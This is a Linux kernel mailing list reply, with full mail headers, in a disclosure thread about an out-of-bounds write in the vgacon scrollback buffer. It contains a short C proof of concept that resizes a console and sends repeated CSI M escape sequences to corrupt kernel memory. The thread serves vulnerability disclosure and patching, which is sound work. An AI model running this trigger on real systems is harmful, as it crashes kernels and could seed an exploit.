Received: by 2002:a25:ca44:0:0:0:0:0 with SMTP id a65csp1039436ybg; Wed, 29 Jul 2020 04:21:10 -0700 (PDT) X-Google-Smtp-Source: ABdhPJylTGrs7uMSX2HPNn1uIDbkz9Z/wiIJuiBn52ZipN58l1J3z89Dgu9Hai2cb1IHktfANXte X-Received: by 2002:aa7:ce90:: with SMTP id y16mr1297032edv.325.1596021670128; Wed, 29 Jul 2020 04:21:10 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1596021670; cv=none; d=google.com; s=arc-20160816; b=Tt270TLj56/F0rFC39/TvIZs37m6wJwY7BwFf4RogjBMawMwRafKfzgM6C2/Q9gNMH ucpqIR8JyJ2tkVCCbyVNoVuHVLZP7TJx2IxFFwTwyog2pC2NKW2b/vkswNk8RGecO52H qseOp49EBJq6tIZyB2U3Wm5eSqEmaGPgQYnNYM76irEMOvAcvnZDVJKbaaIWHJLQjAwI AkVMsv3GYaLmKGZ5RS9OUlk40CaodTVX9swIaK7+GVPMyW3EcN7Ete6+gEIooOiVYA3k NIEkDAVWgUzd08vg8mZ9h06Z0TwJ7wk2Tk8L6iO7qfdEJk7jc1l1gcXDiQOpcAt9qv4p pjHA== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=list-id:precedence:sender:content-transfer-encoding :content-language:in-reply-to:mime-version:user-agent:date :message-id:from:references:cc:to:subject; bh=NiS9IH7Od8Q9xbyIfFxNL/qSLHRh5AtTCa5eRtX/6P0=; b=Vp1SfkKSlziVwFSAF7iWnlXE2yw9mIF+sGnFEXFYbC77OcnyrYbDKqNE9qh/Ft2AsW NiuvNnaAFyxdwXWsbyaNz5ZGeYBZgso5Okx9/4yCtscBLPZYLRlXtE6YiA15ex8a4OGB Ya60h8ewYX5d/Lg/+slS1p5DresWeqILBcKPlnmpEToLq8JWj3pCTgChaDabqBNhHX3z gMvy+vU6SZ+lY084WcX0aIYBmahDemLQ2M0Xx2f6ipAtKivxcsuuzTDhoWrY3/86BqhZ 5eO+qvyPoMYWQ6E/FpWcV9y3rUpt8u/T4prCWi7X0tIB/0BJV6XZiBjZSbpKzD8dR9IN fMQA== ARC-Authentication-Results: i=1; mx.google.com; spf=pass (google.com: domain of linux-kernel-owner@vger.kernel.org designates 23.128.96.18 as permitted sender) smtp.mailfrom=linux-kernel-owner@vger.kernel.org; dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=kernel.org Return-Path: Received: from vger.kernel.org (vger.kernel.org. [23.128.96.18]) by mx.google.com with ESMTP id z10si846736ejr.721.2020.07.29.04.20.46; Wed, 29 Jul 2020 04:21:10 -0700 (PDT) Received-SPF: pass (google.com: domain of linux-kernel-owner@vger.kernel.org designates 23.128.96.18 as permitted sender) client-ip=23.128.96.18; Authentication-Results: mx.google.com; spf=pass (google.com: domain of linux-kernel-owner@vger.kernel.org designates 23.128.96.18 as permitted sender) smtp.mailfrom=linux-kernel-owner@vger.kernel.org; dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=kernel.org Received: (majordomo@vger.kernel.org) by vger.kernel.org via listexpand id S1726560AbgG2LUF (ORCPT + 99 others); Wed, 29 Jul 2020 07:20:05 -0400 Received: from mail-ed1-f65.google.com ([209.85.208.65]:34873 "EHLO mail-ed1-f65.google.com" rhost-flags-OK-OK-OK-OK) by vger.kernel.org with ESMTP id S1726509AbgG2LUF (ORCPT ); Wed, 29 Jul 2020 07:20:05 -0400 Received: by mail-ed1-f65.google.com with SMTP id m20so7633462eds.2; Wed, 29 Jul 2020 04:20:03 -0700 (PDT) X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20161025; h=x-gm-message-state:subject:to:cc:references:from:message-id:date :user-agent:mime-version:in-reply-to:content-language :content-transfer-encoding; bh=NiS9IH7Od8Q9xbyIfFxNL/qSLHRh5AtTCa5eRtX/6P0=; b=Zmy5LvHf6EZfB0YKskh4TRHNgaolaveL99jWlEe2pF1Q7EnWRWklwvfXKhcTfOD820 TbORY0voLA+wtgW1fWR5aZDgC/1i8fRjBjAtXrESiDxX8ct6Ap96/G6dLK6HX/eZl2vm cH73FlZrUok6r1WwTXct4I0j4uJIDok1Hd/tMLlZ4OXkdzyMXWC7GKXOLzUtLWvk0W7d Ok4400nhYZXWQqwLonFlcmuNgnbUB9ztUTZLAu7yejYtMFNfwhV32uV3MPaZ2L/zEpBv 8cCcocxr135coE5UHQ55lkyOF2/7yRHvX5D+2JDrjPhN5vcrsT9TiuELWH9i5lBIQOzd a35g== X-Gm-Message-State: AOAM5320E6g6nNw8zRjgqztYtuPVT6sj6BiI4ww9husibM/rgWu7V1Ky SVT1r2Id09+x+A+hg2u0FFBDFtMt X-Received: by 2002:aa7:c442:: with SMTP id n2mr29841866edr.309.1596021602580; Wed, 29 Jul 2020 04:20:02 -0700 (PDT) Received: from ?IPv6:2a0b:e7c0:0:107::49? ([2a0b:e7c0:0:107::49]) by smtp.gmail.com with ESMTPSA id y14sm420978ejr.35.2020.07.29.04.20.00 (version=TLS1_3 cipher=TLS_AES_128_GCM_SHA256 bits=128/128); Wed, 29 Jul 2020 04:20:01 -0700 (PDT) Subject: Re: [PATCH] vgacon: fix out of bounds write to the scrollback buffer To: =?UTF-8?B?5byg5LqR5rW3?= , b.zolnierkie@samsung.com Cc: linux-kernel@vger.kernel.org, Yang Yingliang , Kyungtae Kim , Linus Torvalds , Greg KH , Solar Designer , "Srivatsa S. Bhat" , Anthony Liguori , Security Officers , linux-distros@vs.openwall.org, dri-devel@lists.freedesktop.org, linux-fbdev@vger.kernel.org References: From: Jiri Slaby Message-ID: Date: Wed, 29 Jul 2020 13:20:00 +0200 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Thunderbird/68.10.0 MIME-Version: 1.0 In-Reply-To: Content-Type: text/plain; charset=utf-8 Content-Language: en-US Content-Transfer-Encoding: 8bit Sender: linux-kernel-owner@vger.kernel.org Precedence: bulk List-ID: X-Mailing-List: linux-kernel@vger.kernel.org On 29. 07. 20, 10:19, 张云海 wrote: > On 2020/7/29 16:11, Jiri Slaby wrote: >> But the loop checks for the overflow: >> if (vgacon_scrollback_cur->tail >= vgacon_scrollback_cur->size) >> vgacon_scrollback_cur->tail = 0; >> >> So the first 2 iterations would write to the end of the buffer and this >> 3rd one should have zeroed ->tail. > > In the 2nd iteration before the check: > vgacon_scrollback_cur->tail is 65360 which is still less then > vgacon_scrollback_cur->size(65440), so the ->tail won't be zeroed. > > Then it gose to the 3rd iteration, overflow occurs. Ahh, I see now! So it must be triggered by CSI M instead. It allows for more than 1 in count. So this is PoC for this case: #include #include #include #include #include #include #include int main(int argc, char** argv) { int fd = open("/dev/tty1", O_RDWR); unsigned short size[3] = {25, 200, 0}; ioctl(fd, 0x5609, size); // VT_RESIZE write(fd, "\e[1;1H", 6); for (int i = 0; i < 30; i++) write(fd, "\e[10M", 5); } It corrupts memory, so it crashes the kernel randomly. Even with my before-loop patch. So now: could you resend your patch with improved commit message, add all those Ccs etc.? You can copy most of the Ccs from my patch verbatim. I am also not sure the test I was pointing out on the top of this message would be of any use after the change. But maybe leave the code rest in peace. thanks, -- js suse labs